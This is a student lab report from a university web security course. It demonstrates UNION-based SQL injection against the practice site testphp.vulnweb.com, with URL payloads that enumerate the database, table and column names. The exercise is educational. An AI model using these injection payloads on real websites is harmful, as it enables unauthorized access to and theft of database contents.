WEB & MOBILE SECURITY LAB

20CSP-338
Submitted for the requirement of

Lab Course

Bachelor Degree of Engineering

COMPUTER SCIENCE & ENGINEERING

Submitted to: Submitted By:

Er. Jayesh Surana Param Sahai
20BCS5964

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING

CHANDIGARH UNIVERSITY, GHARUAN
August-December 2022
 LAB INDEX

NAME: Param Sahai UID: 20BCS5964

SUBJECT NAME: WMS Lab SUBJECT CODE: 20CSP-338
Class/Section: 619/A

Sr. Program Date Evaluation Sign

No LW VV FW Total
(12) (8) (10) (30)
1. Identify Http packet on a monitoring tool like 09/08/2022
Wireshark.

2. Design a method to stimulate the html injection and 16/08/2022

cross site scripting to exploit the attackers.

3. Understand How to find CSRF Vulnerability. 28/08/2022

4. Understand how to perform SQL injection. 29/09/2022

ii
Param Sahai
20BCS5964
 Experiment 1.4

1. Aim/Overview of the practical:

To understand how to perform SQL Injection Attack from the command line (URL).

2. Task to be done/ Which logistics used:

To perform SQL Queries to obtain data using SQL Command Line Injection.
SQL Injection: SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious
SQL statements. These statements control a database server behind a web application. Attackers can use SQL
Injection vulnerabilities to bypass application security measures. They can go around authentication and
authorization of a web page or web application and retrieve the content of the entire SQL database. They can also
use SQL Injection to add, modify, and delete records in the database.

TestPhp.Vulneb: Vulnerable site that we’ll be using to perform SQL injection.

3. Steps:

i. Here we’ll be using another vulnerable site -VULNEB.

ii. Now, Copy and paste the following link : http://testphp.vulnweb.com/listproducts.php?cat=1 .

iii. Next, insert the malicious query (url) by adding – before 1, i.e
http://testphp.vulnweb.com/listproducts.php?cat=-1

iv. We can also put random number in the url along with the order by clause.

v. Now, in order to check the database, search : http://testphp.vulnweb.com/listproducts.php?cat=-1 union

select 1,2,3,4,5,6,7,8,9,10, database ()--

vi. For checking the Tablename :

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,
group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema
=database()--

1
Param Sahai
20BCS5964
Fig 1.4.1 (How does a SQL Injection attack works)

2
Param Sahai
20BCS5964
4. Screenshots:

Fig 1.4.2 (Opening a vulnerable site : VULNEB )

3
Param Sahai
20BCS5964
Fig 1.4.3 (Checking out our query with cat=1)

4
Param Sahai
20BCS5964
Fig 1.4.4 (Checking out our query with cat=-1)

5
Param Sahai
20BCS5964
Fig 1.4.5 (Performing Union Select Query for checking out the Database)

6
Param Sahai
20BCS5964
Fig 1.4.6 (Performing Union Select Query for checking out the Tablename)

7
Param Sahai
20BCS5964
Maybe we can get some important data from the users table, so let’s penetrate more inside. Again,
Use the concat function for table users for retrieving its entire column names.
We successfully retrieve all eight column names from inside the table users.

Fig 1.4.7 (Retrieving the Column Names using concat function)

8
Param Sahai
20BCS5964
Evaluation Grid (To be created as per the SOP and Assessment guidelines by the faculty):

Sr. No. Parameters Marks Obtained Maximum Marks

1.
2.
3.

9
Param Sahai
20BCS5964